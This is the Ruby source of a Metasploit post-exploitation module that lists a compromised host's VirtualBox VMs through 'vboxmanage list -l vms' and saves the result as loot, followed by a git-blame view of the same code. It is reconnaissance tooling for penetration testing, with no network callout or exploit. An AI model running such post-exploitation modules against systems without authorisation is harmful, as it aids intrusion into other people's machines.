metasploit-framework/modules/post/multi/gather/enum_vbox.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'yaml'

class MetasploitModule < Msf::Post
  include Msf::Post::File


  def initialize(info={})
    super( update_info(info,
      'Name'           => 'Multi Gather VirtualBox VM Enumeration',
      'Description'    => %q{
        This module will attempt to enumerate any VirtualBox VMs on the target machine.
        Due to the nature of VirtualBox, this module can only enumerate VMs registered
        for the current user, therefore, this module needs to be invoked from a user context.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['theLightCosine'],
      'Platform'       => %w{ bsd linux osx unix win },
      'SessionTypes'   => ['shell', 'meterpreter' ]
    ))
  end

  def run
    case session.platform
    when 'windows'
      if session.type == 'meterpreter'
        begin
          res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error('VirtualBox does not appear to be installed on this machine')
          return nil
        end

        if res.empty?
          print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')
          return nil
        end
      else
        res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')
        if res.empty?
          print_error('VirtualBox isn\'t installed or this user has no VMs registered')
          return nil
        end
      end
    when 'unix', 'linux', 'bsd', 'osx'
      res = cmd_exec('vboxmanage list -l vms')

      unless res.start_with?('Sun VirtualBox') || res.include?('Name:')
        print_error('VirtualBox isn\'t installed or this user has no VMs registered')
        return nil
      end
    end

    return nil unless res
    vprint_status(res)
    store_path = store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
    print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
  end


end
Post Module to enumerate VirtualBox VMs for the current user. 2012-01-27 17:12:59 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Post Module to enumerate VirtualBox VMs for the current user. 2012-01-27 17:12:59 +00:00			`##`

			`require 'yaml'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Post`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Post::File`


			`def initialize(info={})`
			`super( update_info(info,`
			`'Name' => 'Multi Gather VirtualBox VM Enumeration',`
			`'Description' => %q{`
Update enum_vbox 2015-06-22 22:54:17 +00:00			`This module will attempt to enumerate any VirtualBox VMs on the target machine.`
			`Due to the nature of VirtualBox, this module can only enumerate VMs registered`
Finished spelling issues 2017-09-17 20:00:04 +00:00			`for the current user, therefore, this module needs to be invoked from a user context.`
Update enum_vbox 2015-06-22 22:54:17 +00:00			`},`
Retab modules 2013-08-30 21:28:54 +00:00			`'License' => MSF_LICENSE,`
			`'Author' => ['theLightCosine'],`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 17:33:31 +00:00			`'Platform' => %w{ bsd linux osx unix win },`
Retab modules 2013-08-30 21:28:54 +00:00			`'SessionTypes' => ['shell', 'meterpreter' ]`
			`))`
			`end`

			`def run`
Final pass of regex -> string checks 2016-10-29 04:59:05 +00:00			`case session.platform`
			`when 'windows'`
Update enum_vbox 2015-06-22 22:54:17 +00:00			`if session.type == 'meterpreter'`
			`begin`
			`res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')`
			`rescue ::Rex::Post::Meterpreter::RequestError`
			`print_error('VirtualBox does not appear to be installed on this machine')`
			`return nil`
			`end`

			`if res.empty?`
			`print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')`
			`return nil`
			`end`
			`else`
			`res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')`
			`if res.empty?`
			`print_error('VirtualBox isn\'t installed or this user has no VMs registered')`
			`return nil`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Final pass of regex -> string checks 2016-10-29 04:59:05 +00:00			`when 'unix', 'linux', 'bsd', 'osx'`
Update enum_vbox 2015-06-22 22:54:17 +00:00			`res = cmd_exec('vboxmanage list -l vms')`

			`unless res.start_with?('Sun VirtualBox') \|\| res.include?('Name:')`
			`print_error('VirtualBox isn\'t installed or this user has no VMs registered')`
Retab modules 2013-08-30 21:28:54 +00:00			`return nil`
			`end`
			`end`
Update enum_vbox 2015-06-22 22:54:17 +00:00
fixes to more modules 2017-09-30 19:45:52 +00:00			`return nil unless res`
Update enum_vbox 2015-06-22 22:54:17 +00:00			`vprint_status(res)`
			`store_path = store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")`
			`print_good("#{peer} - File successfully retrieved and saved on #{store_path}")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Post Module to enumerate VirtualBox VMs for the current user. 2012-01-27 17:12:59 +00:00

			`end`